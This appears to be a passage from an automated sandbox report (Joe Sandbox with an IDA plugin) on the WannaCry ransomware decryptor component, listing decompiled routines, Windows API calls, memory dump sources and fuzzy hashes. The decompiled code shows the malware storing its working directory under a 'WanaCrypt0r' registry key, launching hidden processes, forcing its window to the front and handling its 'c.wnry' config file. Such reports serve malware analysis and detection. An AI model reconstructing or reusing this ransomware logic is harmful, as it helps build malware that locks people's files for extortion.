                                                      						L00412B72();
                                                      						if(_t44 == 1) {
                                                      							_push("***");
                                                      							L00412CAA();
                                                      							_push("\t");
                                                      							_v8 = 1;
                                                      							L00412F68();
                                                      							_push( &_v44);
                                                      							L00412F62();
                                                      							_push(0x3b);
                                                      							_push(0xa);
                                                      							L00412F5C();
                                                      							_push(0x3b);
                                                      							_push(0xd);
                                                      							L00412F5C();
                                                      							_push(1);
                                                      							_v164 = _t73;
                                                      							L00412F56();
                                                      							E004082C0(_t70,  &_v168,  &_v160);
                                                      							_v44 = 0;
                                                      							L00412CC2();
                                                      						}
                                                      						_v4 = 2;
                                                      						_v20 = 0x415c00;
                                                      						_v136 =  &_v20;
                                                      						_v4 = 5;
                                                      						L00412D52();
                                                      						_v20 = 0x415bec;
                                                      						_v136 =  &_v32;
                                                      						_v32 = 0x415c00;
                                                      						_v4 = 6;
                                                      						L00412D52();
                                                      						_v32 = 0x415bec;
                                                      						_v4 = 2;
                                                      						L00412CC2();
                                                      						_v4 = 0xffffffff;
                                                      						L00412C86();
                                                      					}
                                                      				}
                                                      				_t42 = _a8;
                                                      				_push(_a12);
                                                      				_push(_t42);
                                                      				_push(_a4);
                                                      				L00412BAE(); // executed
                                                      				 *[fs:0x0] = _v24;
                                                      				return _t42;
                                                      			}
                                                      APIs
                                                      • #2514.MFC42 ref: 00407AF1
                                                      • #537.MFC42(***), ref: 00407B04
                                                      • #941.MFC42(00421234,***), ref: 00407B1A
                                                      • #939.MFC42(?,00421234,***), ref: 00407B28
                                                      • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                                      • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                                      • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                                      • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                                      • #2385.MFC42(?,?,?), ref: 00407C0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                                      • String ID: ***$[A$[A
                                                      • API String ID: 3659526348-3419262722
                                                      • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                                      • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 4063a0-4064b5 #2302 * 12 #2370 * 3
                                                      APIs
                                                      • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                                      • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                                      • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                                      • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                                      • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                                      • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                                      • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                                      • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                                      • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                                      • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                                      • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                                      • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                                      • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                                      • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                                      • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2302$#2370
                                                      • String ID:
                                                      • API String ID: 1711274145-0
                                                      • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                                      • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 142 401c70-401cd8 wcscat 143 401cdc-401cde 142->143 144 401ce0-401cef 143->144 145 401cf1-401cfb 143->145 146 401d00-401d0c RegCreateKeyW 144->146 145->146 147 401d12-401d1b 146->147 148 401dad-401db5 146->148 149 401d62-401d8e RegQueryValueExA 147->149 150 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 147->150 148->143 151 401dbb-401dc7 148->151 152 401d9e-401dab RegCloseKey 149->152 153 401d90-401d98 SetCurrentDirectoryA 149->153 150->152 152->148 154 401dc8-401dd7 152->154 153->152
                                                      C-Code - Quality: 84%
                                                      			E00401C70(signed int _a4) {
                                                      				void _v519;
                                                      				char _v520;
                                                      				void _v700;
                                                      				short _v720;
                                                      				int _v724;
                                                      				void* _v728;
                                                      				int _t30;
                                                      				void* _t36;
                                                      				signed int _t38;
                                                      				signed int _t46;
                                                      				signed int _t56;
                                                      				int _t72;
                                                      				void* _t77;
                                                      
                                                      				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
                                                      				_v520 = _t30;
                                                      				memset( &_v519, _t30, 0x81 << 2);
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				_v728 = 0;
                                                      				wcscat( &_v720, L"WanaCrypt0r");
                                                      				_t72 = 0;
                                                      				_v724 = 0;
                                                      				do {
                                                      					if(_t72 != 0) {
                                                      						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
                                                      					} else {
                                                      						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
                                                      					}
                                                      					_t36 = _v728;
                                                      					if(_t36 == 0) {
                                                      						goto L10;
                                                      					} else {
                                                      						_t56 = _a4;
                                                      						if(_t56 == 0) {
                                                      							_v724 = 0x207;
                                                      							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
                                                      							asm("sbb esi, esi");
                                                      							_t77 =  ~_t38 + 1;
                                                      							if(_t77 != 0) {
                                                      								SetCurrentDirectoryA( &_v520);
                                                      							}
                                                      						} else {
                                                      							GetCurrentDirectoryA(0x207,  &_v520);
                                                      							asm("repne scasb");
                                                      							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
                                                      							_t72 = _v724;
                                                      							asm("sbb esi, esi");
                                                      							_t77 =  ~_t46 + 1;
                                                      						}
                                                      						RegCloseKey(_v728); // executed
                                                      						if(_t77 != 0) {
                                                      							return 1;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      					}
                                                      					L13:
                                                      					L10:
                                                      					_t72 = _t72 + 1;
                                                      					_v724 = _t72;
                                                      				} while (_t72 < 2);
                                                      				return 0;
                                                      				goto L13;
                                                      			}
                                                      APIs
                                                      • wcscat.MSVCRT ref: 00401CC1
                                                      • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                      • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                      • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                      • RegQueryValueExA.KERNELBASE ref: 00401D81
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                                      • String ID: Software\$WanaCrypt0r
                                                      • API String ID: 3883271862-1723423467
                                                      • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                                      • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 155 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 156 408660-4086a6 #6140 155->156 157 408654-408658 155->157 157->156 158 40865a-40865e GetSysColor 157->158 158->156
                                                      C-Code - Quality: 83%
                                                      			E004085C0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v16;
                                                      				long _v20;
                                                      				void _v24;
                                                      				intOrPtr _v28;
                                                      				int _t33;
                                                      				intOrPtr _t50;
                                                      				long _t53;
                                                      				intOrPtr _t55;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413FF3);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t55;
                                                      				_t50 = __ecx;
                                                      				_v16 = __ecx;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx)) = 0x4157f0;
                                                      				_v4 = 0;
                                                      				L00412F74();
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x78)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x80)) = 0;
                                                      				_v4 = 1;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4161a4;
                                                      				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
                                                      				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
                                                      				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
                                                      				_t53 = GetSysColor(2);
                                                      				_v20 = _t53;
                                                      				_v24 = 0;
                                                      				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
                                                      				if(_t33 != 0 && _v24 != 0) {
                                                      					_t53 = GetSysColor(0x1b);
                                                      				}
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				L00412F50();
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
                                                      				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
                                                      				 *((intOrPtr*)(_t50 + 0x68)) = 0;
                                                      				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
                                                      				 *((intOrPtr*)(_t50 + 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t50;
                                                      			}













                                                      APIs
                                                      • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                      • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                      • GetSysColor.USER32 ref: 0040861D
                                                      • GetSysColor.USER32(00000009), ref: 00408624
                                                      • GetSysColor.USER32(00000012), ref: 0040862B
                                                      • GetSysColor.USER32(00000002), ref: 00408632
                                                      • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                      • GetSysColor.USER32(0000001B), ref: 0040865C
                                                      • #6140.MFC42(00000002,000000FF), ref: 00408667
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$#341#567#6140CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2603677082-0
                                                      • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                                      • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 100%
                                                      			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
                                                      				struct HWND__* _t4;
                                                      				struct HWND__* _t15;
                                                      
                                                      				_t4 = FindWindowW(0, _a4); // executed
                                                      				_t15 = _t4;
                                                      				if(_t15 != 0) {
                                                      					ShowWindow(_t15, 5);
                                                      					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
                                                      					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                                      					SetForegroundWindow(_t15);
                                                      					SetFocus(_t15);
                                                      					SetActiveWindow(_t15);
                                                      					BringWindowToTop(_t15);
                                                      					_t4 = _a8;
                                                      					if(_t4 != 0) {
                                                      						ExitProcess(0);
                                                      					}
                                                      				}
                                                      				return _t4;
                                                      			}






                                                      APIs
                                                      • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                      • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                      • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                      • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                      • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                      • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                      • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                      • BringWindowToTop.USER32(00000000), ref: 0040B678
                                                      • ExitProcess.KERNEL32 ref: 0040B689
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID:
                                                      • API String ID: 962039509-0
                                                      • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                                      • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 163 401a90-401aeb CreateProcessA 164 401b45-401b4c 163->164 165 401aed-401af3 163->165 166 401af5-401b03 WaitForSingleObject 165->166 167 401b26-401b44 CloseHandle * 2 165->167 168 401b12-401b18 166->168 169 401b05-401b0c TerminateProcess 166->169 168->167 170 401b1a-401b20 GetExitCodeProcess 168->170 169->168 170->167
                                                      C-Code - Quality: 100%
                                                      			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
                                                      				struct _STARTUPINFOA _v68;
                                                      				struct _PROCESS_INFORMATION _v84;
                                                      				void* _t21;
                                                      				int _t23;
                                                      				long _t25;
                                                      				DWORD* _t30;
                                                      
                                                      				_v68.cb = 0x44;
                                                      				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
                                                      				_v84.hThread = _t21;
                                                      				_v84.dwProcessId = _t21;
                                                      				_v84.dwThreadId = _t21;
                                                      				_v84.hProcess = 0;
                                                      				_v68.dwFlags = 1;
                                                      				_v68.wShowWindow = 0;
                                                      				_t23 = CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84); // executed
                                                      				if(_t23 == 0) {
                                                      					return 0;
                                                      				} else {
                                                      					_t25 = _a8;
                                                      					if(_t25 != 0) {
                                                      						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
                                                      							TerminateProcess(_v84.hProcess, 0xffffffff);
                                                      						}
                                                      						_t30 = _a12;
                                                      						if(_t30 != 0) {
                                                      							GetExitCodeProcess(_v84.hProcess, _t30);
                                                      						}
                                                      					}
                                                      					CloseHandle(_v84);
                                                      					CloseHandle(_v84.hThread);
                                                      					return 1;
                                                      				}
                                                      			}










                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                                      • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                      • String ID: D
                                                      • API String ID: 786732093-2746444292
                                                      • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                                      • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 171 401a10-401a18 172 401a21 171->172 173 401a1a-401a1f 171->173 174 401a26-401a38 fopen 172->174 173->174 175 401a3a-401a44 174->175 176 401a6f-401a73 174->176 177 401a53-401a58 fwrite 175->177 178 401a46-401a51 fread 175->178 179 401a5e-401a64 177->179 178->179 180 401a74-401a84 fclose 179->180 181 401a66-401a6c fclose 179->181 181->176
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fclose$fopenfreadfwrite
                                                      • String ID: c.wnry
                                                      • API String ID: 2140422903-3240288721
                                                      • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                                      • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 182 4043e0-404408 #4284 #3874 #5277
                                                      C-Code - Quality: 50%
                                                      			E004043E0(void* __ecx) {
                                                      				void* _t3;
                                                      
                                                      				_push(1);
                                                      				_push(0x100);
                                                      				_push(0);
                                                      				L00412DDC();
                                                      				_t3 = __ecx + 0x40;
                                                      				_push(_t3); // executed
                                                      				L00412DD6(); // executed
                                                      				 *((char*)(__ecx + 0x5a)) = 0;
                                                      				L00412C14();
                                                      				return _t3;
                                                      			}





                                                      APIs
                                                      • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                                      • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                                      • #5277.MFC42 ref: 00404402
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3874#4284#5277
                                                      • String ID:
                                                      • API String ID: 1717392697-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 4133e6-4133fb #1576
                                                      C-Code - Quality: 28%
                                                      			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                      
                                                      				_t1 =  &_a16; // 0x413236
                                                      				_push( *_t1);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				L0041343E(); // executed
                                                      				return __eax;
                                                      			}




                                                      APIs
                                                      • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1576
                                                      • String ID: 62A
                                                      • API String ID: 1976119259-856450375
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
